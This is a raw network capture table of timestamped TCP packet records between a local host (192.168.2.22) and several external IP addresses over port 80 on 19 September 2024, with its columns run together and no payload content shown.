                                                      Sep 19, 2024 15:04:56.729448080 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.729463100 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.729476929 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.729475975 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.729492903 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.729496956 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.729541063 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.729576111 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.729590893 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.729607105 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.729650021 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.734528065 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.734563112 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.734581947 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.734597921 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.734646082 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.817672968 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.817691088 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.817760944 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.817763090 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.817775965 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.817791939 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.817816973 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.818221092 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.818249941 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.818265915 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.818267107 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.818280935 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.818299055 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.818319082 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.819092035 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.819117069 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.819133043 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.819137096 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.819165945 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.819173098 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.819181919 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.819224119 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.820046902 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.820082903 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.820135117 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:57.711040974 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:58.720540047 CEST4917480192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:58.846908092 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:58.847086906 CEST4917480192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:58.857593060 CEST4917480192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:58.862677097 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.430759907 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.430784941 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.430799007 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.430814028 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.430820942 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.430834055 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.430847883 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.430888891 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.430903912 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.430922031 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.431051016 CEST4917480192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:59.436007977 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.436028957 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.436044931 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.436086893 CEST4917480192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:59.436145067 CEST4917480192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:59.517538071 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.517589092 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.517604113 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.517620087 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.517729044 CEST4917480192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:59.517947912 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.517962933 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.517980099 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.517993927 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.517997980 CEST4917480192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:59.518032074 CEST4917480192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:59.518625975 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.518640995 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.518655062 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.518667936 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.518672943 CEST4917480192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:59.518702984 CEST4917480192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:59.519330025 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.519344091 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.519361973 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:59.519378901 CEST4917480192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:59.519395113 CEST4917480192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:59.522866964 CEST4917480192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:59.527139902 CEST4917480192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:59.531982899 CEST804917467.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:05:04.545845985 CEST4917580192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:04.550805092 CEST804917585.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:04.550892115 CEST4917580192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:04.561189890 CEST4917580192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:04.566039085 CEST804917585.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:04.566149950 CEST804917585.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:04.566158056 CEST4917580192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:04.570939064 CEST804917585.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:06.080388069 CEST4917580192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:06.085699081 CEST804917585.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:06.089113951 CEST4917580192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:07.092124939 CEST4917680192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:07.097213984 CEST804917685.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:07.097316980 CEST4917680192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:07.129654884 CEST4917680192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:07.134670973 CEST804917685.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:08.643465996 CEST4917680192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:08.648720026 CEST804917685.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:08.649235010 CEST4917680192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:09.709878922 CEST4917780192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:09.715069056 CEST804917785.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:09.715142012 CEST4917780192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:09.730232954 CEST4917780192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:09.735516071 CEST804917785.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:09.735555887 CEST804917785.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:09.735575914 CEST4917780192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:09.740493059 CEST804917785.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:09.740593910 CEST804917785.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:11.238094091 CEST4917780192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:11.243341923 CEST804917785.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:11.243411064 CEST4917780192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:12.973125935 CEST4917880192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:12.978207111 CEST804917885.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:12.978357077 CEST4917880192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:12.989339113 CEST4917880192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:12.994227886 CEST804917885.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:13.658555984 CEST804917885.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:13.658670902 CEST804917885.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:13.658801079 CEST4917880192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:13.664211035 CEST4917880192.168.2.2285.159.66.93
                                                      Sep 19, 2024 15:05:13.668952942 CEST804917885.159.66.93192.168.2.22
                                                      Sep 19, 2024 15:05:16.991409063 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:05:16.996714115 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:05:16.997103930 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:05:18.792594910 CEST4917980192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:18.798383951 CEST8049179208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:18.798449993 CEST4917980192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:18.812406063 CEST4917980192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:18.817759991 CEST8049179208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:18.817785978 CEST8049179208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:18.817806005 CEST4917980192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:18.822832108 CEST8049179208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:19.893662930 CEST8049179208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:19.893716097 CEST4917980192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:19.894752026 CEST8049179208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:19.895277023 CEST4917980192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:19.895693064 CEST8049179208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:19.895724058 CEST4917980192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:20.325527906 CEST4917980192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:20.644793034 CEST4917980192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:21.118727922 CEST8049179208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:21.118747950 CEST8049179208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:21.118819952 CEST4917980192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:21.334971905 CEST4918080192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:21.340015888 CEST8049180208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:21.340092897 CEST4918080192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:21.354839087 CEST4918080192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:21.359899998 CEST8049180208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:21.854530096 CEST8049180208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:21.857455015 CEST4918080192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:22.882661104 CEST4918080192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:23.187616110 CEST4918080192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:23.572738886 CEST8049180208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:23.572767973 CEST8049180208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:23.573698997 CEST4918080192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:23.892050028 CEST4918180192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:23.897699118 CEST8049181208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:23.897789001 CEST4918180192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:23.908811092 CEST4918180192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:23.915142059 CEST8049181208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:23.915198088 CEST4918180192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:23.915508032 CEST8049181208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:23.922075033 CEST8049181208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:23.922523022 CEST8049181208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:24.427558899 CEST8049181208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:24.427620888 CEST4918180192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:25.421128035 CEST4918180192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:25.426150084 CEST8049181208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:26.482980013 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:26.489805937 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:26.489862919 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:26.496952057 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:26.503665924 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.527949095 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.527972937 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.527982950 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.528026104 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.528037071 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.528045893 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.528063059 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.528074026 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.528084040 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.528093100 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.528120995 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:27.528163910 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:27.533077955 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.568784952 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.568813086 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.568908930 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:27.616812944 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.616837978 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.616848946 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.616858959 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.616871119 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.616898060 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:27.617008924 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.617019892 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.617028952 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.617041111 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:27.617053986 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:27.617475986 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.617491961 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.617501974 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.617510080 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.617521048 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.617530107 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:27.617552996 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:27.618294954 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.618321896 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.618330956 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.618365049 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:27.618424892 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.618434906 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.618459940 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:27.618511915 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:27.619250059 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.619260073 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.619268894 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.619290113 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:27.656557083 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.656630993 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:27.657788992 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.699227095 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.699245930 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.699258089 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.699302912 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:27.705147982 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.705163956 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.705173969 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.705183983 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.705193996 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.705202103 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.705208063 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:27.705224037 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:27.926521063 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:27.933232069 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:32.561736107 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:32.561813116 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:05:32.561898947 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:32.565709114 CEST4918280192.168.2.22208.91.197.27
                                                      Sep 19, 2024 15:05:32.570578098 CEST8049182208.91.197.27192.168.2.22
                                                      Sep 19, 2024 15:06:06.662669897 CEST4918380192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:06.667702913 CEST8049183194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:06.667757988 CEST4918380192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:06.691634893 CEST4918380192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:06.696566105 CEST8049183194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:06.696619034 CEST4918380192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:06.696683884 CEST8049183194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:06.701534986 CEST8049183194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:07.378061056 CEST8049183194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:07.378113031 CEST8049183194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:07.378151894 CEST8049183194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:07.378184080 CEST8049183194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:07.378189087 CEST4918380192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:07.378348112 CEST4918380192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:07.378540993 CEST8049183194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:07.381226063 CEST4918380192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:08.193774939 CEST4918380192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:09.210344076 CEST4918480192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:09.335200071 CEST8049184194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:09.339364052 CEST4918480192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:09.350878000 CEST4918480192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:09.358563900 CEST8049184194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:10.060755014 CEST8049184194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:10.060798883 CEST8049184194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:10.060851097 CEST4918480192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:10.060853004 CEST8049184194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:10.060883045 CEST8049184194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:10.060925961 CEST4918480192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:10.060987949 CEST8049184194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:10.061033010 CEST4918480192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:10.861416101 CEST4918480192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:11.881179094 CEST4918580192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:11.886132002 CEST8049185194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:11.893186092 CEST4918580192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:11.900881052 CEST4918580192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:11.905745983 CEST8049185194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:11.905836105 CEST8049185194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:11.905996084 CEST4918580192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:11.910789013 CEST8049185194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:11.910927057 CEST8049185194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:12.589276075 CEST8049185194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:12.589293003 CEST8049185194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:12.589303970 CEST8049185194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:12.589315891 CEST8049185194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:12.589335918 CEST4918580192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:12.589390039 CEST4918580192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:12.589607000 CEST8049185194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:12.589646101 CEST4918580192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:13.404217958 CEST4918580192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:14.421061039 CEST4918680192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:14.425985098 CEST8049186194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:14.426049948 CEST4918680192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:14.433381081 CEST4918680192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:14.438179016 CEST8049186194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:15.121890068 CEST8049186194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:15.121917009 CEST8049186194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:15.121927023 CEST8049186194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:15.121938944 CEST8049186194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:15.121951103 CEST8049186194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:15.122006893 CEST8049186194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:15.122019053 CEST8049186194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:15.122029066 CEST8049186194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:15.122040987 CEST8049186194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:15.122052908 CEST8049186194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:15.122139931 CEST4918680192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:15.122139931 CEST4918680192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:15.122299910 CEST8049186194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:15.123316050 CEST4918680192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:15.136198997 CEST4918680192.168.2.22194.58.112.174
                                                      Sep 19, 2024 15:06:15.140930891 CEST8049186194.58.112.174192.168.2.22
                                                      Sep 19, 2024 15:06:20.159925938 CEST4918780192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:20.164699078 CEST8049187103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:20.164755106 CEST4918780192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:20.173080921 CEST4918780192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:20.177963018 CEST8049187103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:20.178008080 CEST4918780192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:20.178042889 CEST8049187103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:20.182845116 CEST8049187103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:21.638793945 CEST8049187103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:21.638813019 CEST8049187103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:21.638823986 CEST8049187103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:21.638837099 CEST8049187103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:21.638848066 CEST8049187103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:21.638869047 CEST4918780192.168.2.22103.21.221.4
                                                      Sep 19, 2024 15:06:21.638873100 CEST8049187103.21.221.4192.168.2.22
                                                      Sep 19, 2024 15:06:21.638886929 CEST8049187103.21.221.4192.168.2.22
